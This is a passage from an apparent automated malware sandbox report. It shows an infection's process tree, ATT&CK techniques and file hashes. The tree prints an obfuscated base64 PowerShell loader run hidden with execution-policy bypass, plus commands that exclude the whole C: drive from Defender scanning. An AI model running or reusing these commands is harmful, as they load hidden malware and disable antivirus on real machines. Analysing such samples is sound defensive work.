                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:5244
                                                                                                                                                • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                  choice /d y /t 5
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2548
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5412
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2564
                                                                                                                                              • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                "C:\Users\Admin\Abspawnhlp.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1748
                                                                                                                                                • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:6288
                                                                                                                                                  • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                    9⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2036
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    9⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2564
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413710101\3702f2dca5.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413710101\3702f2dca5.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:6872
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
                                                                                                                                              6⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:6004
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5848
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                                  8⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Drops startup file
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4592
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                    9⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1252
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413730101\TbV75ZR.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413730101\TbV75ZR.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5812
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5096
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 496
                                                                                                                                                  8⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5696
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413740101\qWR3lUj.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:6240
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:6336
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5192
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413750101\p3hx1_003.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413750101\p3hx1_003.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:6388
                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                  7⤵
                                                                                                                                                    PID:6964
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                      8⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:6260
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    "C:\Windows\system32\svchost.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Downloads MZ/PE file
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    PID:4448
                                                                                                                                                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:7080
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                      8⤵
                                                                                                                                                      • Deletes itself
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:6356
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413760101\Rm3cVPI.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413760101\Rm3cVPI.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5664
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10413770101\YGYZCmt.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413770101\YGYZCmt.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:12408
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:12488
                                                                                                                                      • C:\Windows\System32\sihclient.exe
                                                                                                                                        C:\Windows\System32\sihclient.exe /cv 1228S+yVDUi7d6qvgyBpzQ.0.2
                                                                                                                                        1⤵
                                                                                                                                          PID:64
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                          1⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:4428
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                          1⤵
                                                                                                                                            PID:3744
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:5852
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                              1⤵
                                                                                                                                                PID:1176
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                1⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                PID:6564
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5096 -ip 5096
                                                                                                                                                1⤵
                                                                                                                                                  PID:4480
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4004
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6896

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Reconnaissance

                                                                                                                                                    Resource Development

                                                                                                                                                    Initial Access

                                                                                                                                                    Execution

                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                    1
                                                                                                                                                    T1059

                                                                                                                                                    PowerShell

                                                                                                                                                    1
                                                                                                                                                    T1059.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    System Services

                                                                                                                                                    2
                                                                                                                                                    T1569

                                                                                                                                                    Service Execution

                                                                                                                                                    2
                                                                                                                                                    T1569.002

                                                                                                                                                    Persistence

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Create or Modify System Process

                                                                                                                                                    8
                                                                                                                                                    T1543

                                                                                                                                                    Windows Service

                                                                                                                                                    8
                                                                                                                                                    T1543.003

                                                                                                                                                    Event Triggered Execution

                                                                                                                                                    1
                                                                                                                                                    T1546

                                                                                                                                                    Netsh Helper DLL

                                                                                                                                                    1
                                                                                                                                                    T1546.007

                                                                                                                                                    Modify Authentication Process

                                                                                                                                                    1
                                                                                                                                                    T1556

                                                                                                                                                    Pre-OS Boot

                                                                                                                                                    1
                                                                                                                                                    T1542

                                                                                                                                                    Bootkit

                                                                                                                                                    1
                                                                                                                                                    T1542.003

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Create or Modify System Process

                                                                                                                                                    8
                                                                                                                                                    T1543

                                                                                                                                                    Windows Service

                                                                                                                                                    8
                                                                                                                                                    T1543.003

                                                                                                                                                    Event Triggered Execution

                                                                                                                                                    1
                                                                                                                                                    T1546

                                                                                                                                                    Netsh Helper DLL

                                                                                                                                                    1
                                                                                                                                                    T1546.007

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Defense Evasion

                                                                                                                                                    File and Directory Permissions Modification

                                                                                                                                                    1
                                                                                                                                                    T1222

                                                                                                                                                    Hide Artifacts

                                                                                                                                                    1
                                                                                                                                                    T1564

                                                                                                                                                    Ignore Process Interrupts

                                                                                                                                                    1
                                                                                                                                                    T1564.011

                                                                                                                                                    Impair Defenses

                                                                                                                                                    7
                                                                                                                                                    T1562

                                                                                                                                                    Disable or Modify System Firewall

                                                                                                                                                    1
                                                                                                                                                    T1562.004

                                                                                                                                                    Disable or Modify Tools

                                                                                                                                                    5
                                                                                                                                                    T1562.001

                                                                                                                                                    Modify Authentication Process

                                                                                                                                                    1
                                                                                                                                                    T1556

                                                                                                                                                    Modify Registry

                                                                                                                                                    7
                                                                                                                                                    T1112

                                                                                                                                                    Pre-OS Boot

                                                                                                                                                    1
                                                                                                                                                    T1542

                                                                                                                                                    Bootkit

                                                                                                                                                    1
                                                                                                                                                    T1542.003

                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                    2
                                                                                                                                                    T1497

                                                                                                                                                    Credential Access

                                                                                                                                                    Credentials from Password Stores

                                                                                                                                                    2
                                                                                                                                                    T1555

                                                                                                                                                    Credentials from Web Browsers

                                                                                                                                                    1
                                                                                                                                                    T1555.003

                                                                                                                                                    Windows Credential Manager

                                                                                                                                                    1
                                                                                                                                                    T1555.004

                                                                                                                                                    Modify Authentication Process

                                                                                                                                                    1
                                                                                                                                                    T1556

                                                                                                                                                    Steal Web Session Cookie

                                                                                                                                                    1
                                                                                                                                                    T1539

                                                                                                                                                    Unsecured Credentials

                                                                                                                                                    5
                                                                                                                                                    T1552

                                                                                                                                                    Credentials In Files

                                                                                                                                                    5
                                                                                                                                                    T1552.001

                                                                                                                                                    Discovery

                                                                                                                                                    Browser Information Discovery

                                                                                                                                                    1
                                                                                                                                                    T1217

                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                    1
                                                                                                                                                    T1120

                                                                                                                                                    Process Discovery

                                                                                                                                                    1
                                                                                                                                                    T1057

                                                                                                                                                    Query Registry

                                                                                                                                                    9
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    6
                                                                                                                                                    T1082

                                                                                                                                                    System Location Discovery

                                                                                                                                                    1
                                                                                                                                                    T1614

                                                                                                                                                    System Language Discovery

                                                                                                                                                    1
                                                                                                                                                    T1614.001

                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                    2
                                                                                                                                                    T1497

                                                                                                                                                    Lateral Movement

                                                                                                                                                    Collection

                                                                                                                                                    Data from Local System

                                                                                                                                                    4
                                                                                                                                                    T1005

                                                                                                                                                    Command and Control

                                                                                                                                                    Exfiltration

                                                                                                                                                    Impact

                                                                                                                                                    Service Stop

                                                                                                                                                    1
                                                                                                                                                    T1489

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                      Filesize

                                                                                                                                                      27KB

                                                                                                                                                      MD5

                                                                                                                                                      5b8fb06983be9063ef128fa5aee80b3a

                                                                                                                                                      SHA1

                                                                                                                                                      c065a0ee84eb1fd646ea213bca20543306d7c9e1

                                                                                                                                                      SHA256

                                                                                                                                                      ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e

                                                                                                                                                      SHA512

                                                                                                                                                      868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                                                                                                      Filesize

                                                                                                                                                      649B

                                                                                                                                                      MD5

                                                                                                                                                      571ca1ef58ac71b1bd4c17b91bb179a7

                                                                                                                                                      SHA1

